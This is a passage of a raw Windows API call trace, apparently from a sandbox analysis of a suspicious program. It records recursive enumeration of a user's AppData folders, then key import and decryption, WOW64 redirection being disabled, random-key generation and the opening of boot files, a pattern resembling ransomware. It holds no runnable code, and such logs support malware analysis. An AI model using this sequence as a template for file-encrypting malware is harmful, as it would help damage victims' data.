[0155.745] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.746] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.746] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.746] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.746] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.809] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.809] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.809] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.810] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.810] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.810] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.810] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.810] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.810] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.811] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.814] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.814] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.816] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.817] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.817] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.817] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.818] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.818] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32c68 [0156.192] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0156.338] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0156.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32da8 [0156.909] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0156.909] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0156.910] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0156.910] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0156.910] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.910] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0156.922] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.922] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.922] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0156.923] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0156.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0156.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0156.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0156.925] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0156.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0156.926] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0156.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0156.929] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0156.929] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0156.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0156.929] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0156.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0156.930] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0156.932] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.932] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.932] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0156.932] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0156.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0156.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0156.933] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0156.933] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0156.933] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0156.933] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0156.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0157.072] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0157.073] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0157.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0157.073] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0157.073] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0157.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0157.073] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0157.073] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0157.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0157.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1024\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.079] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.079] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.079] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.080] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.081] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0157.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0157.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.081] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0157.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0157.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.082] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0157.083] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0157.083] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.083] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.084] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.085] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.085] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.085] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\GameExplorer\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.086] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.086] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32da8 [0157.090] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.137] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0157.137] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0157.137] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0157.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0157.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32c68 [0157.143] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.143] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.143] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.144] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0157.144] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0157.144] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0157.144] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.145] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Ringtones\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.146] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0157.146] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0157.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0157.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0157.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0157.157] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0157.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32d68 [0157.449] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0157.450] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0157.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32d28 [0157.506] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.507] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0157.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32c28 Thread: id = 138 os_tid = 0x494 [0132.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2297a80 [0132.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22a7a88 [0132.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x20f5558 [0132.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x110102) returned 0x2f50020 [0132.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x2227790 [0132.705] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fc00 | out: phKey=0x2c9fc00*=0xa286f8) returned 1 [0132.705] CryptSetKeyParam (hKey=0xa286f8, dwParam=0x1, pbData=0x2c9fbe8, dwFlags=0x0) returned 1 [0132.705] CryptDecrypt (in: hKey=0xa286f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227790, pdwDataLen=0x2c9fbb4 | out: pbData=0x2227790, pdwDataLen=0x2c9fbb4) returned 1 [0132.705] CryptDestroyKey (hKey=0xa286f8) returned 1 [0132.705] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0132.705] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0132.705] Wow64DisableWow64FsRedirection (in: OldValue=0x2c9fc4c | out: OldValue=0x2c9fc4c*=0x0) returned 1 [0132.705] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0132.705] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.705] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.706] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.706] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0132.706] CloseHandle (hObject=0x11c) returned 1 [0132.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.706] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.706] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0132.706] CloseHandle (hObject=0x11c) returned 1 [0132.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.706] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.707] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: 